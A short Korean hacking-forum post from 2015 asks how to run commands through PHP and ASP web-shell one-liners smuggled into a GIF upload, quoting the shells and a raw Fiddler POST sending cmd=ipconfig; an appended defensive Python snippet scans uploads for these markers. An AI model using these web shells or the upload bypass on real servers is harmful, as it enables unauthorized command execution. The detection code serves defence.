http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=209
Having bypassed the file upload (by putting the code below into a gif file)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
and inserted it into the page, I would like to try out a command such as ipconfig.
(The code above calls cmd and runs cmd commands, right?)
Can I just send the following from the Composer tab in Fiddler??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;
Is it OK to execute and test it this way?
Hit : 4899 Date : 2015/07/26 12:22
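An added example, not part of the original post: a defender-side upload check that flags GIF uploads carrying server-side script markers like the two one-liners quoted above. The function name `inspect_gif_upload`, the marker patterns and the sample bytes are constructed for illustration, and the scan is a heuristic.

```python
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")

# Server-side script markers; the patterns cover the two one-liners quoted
# in the post (classic ASP and PHP). Hypothetical rule names.
MARKERS = {
    "php_open_tag": re.compile(rb"<\?php\b", re.I),
    "asp_block": re.compile(rb"<%\s*(?:execute|eval|request|response)\b", re.I),
    "eval_of_request_input": re.compile(
        rb"\b(?:eval|execute)\s*\(\s*(?:\$_(?:POST|GET|REQUEST|COOKIE)\b|request\s*\()",
        re.I,
    ),
}


def inspect_gif_upload(data: bytes) -> dict[str, int]:
    """Return {finding: byte offset}; an empty dict means nothing was flagged."""
    findings = {}
    if not data.startswith(GIF_MAGIC):
        findings["not_a_gif_header"] = 0
    for name, pattern in MARKERS.items():
        match = pattern.search(data)
        if match:
            findings[name] = match.start()
    return findings


# Constructed samples: a minimal 1x1 GIF, then the same bytes followed by
# the one-liners from the post, then a script with no GIF header at all.
CLEAN_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)
PHP_SAMPLE = CLEAN_GIF + b"<?php eval($_POST[cmd]);?>"
ASP_SAMPLE = CLEAN_GIF + b'<%execute(request("cmd"))%>'
RENAMED_SCRIPT = b"<?php eval($_POST[cmd]);?>"

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN_GIF), ("php", PHP_SAMPLE),
                        ("asp", ASP_SAMPLE), ("renamed", RENAMED_SCRIPT)]:
        print(label, inspect_gif_upload(blob))
```

A marker scan only catches known patterns; storing uploads where the web server will not execute them, or re-encoding images on upload, does not depend on recognising the payload.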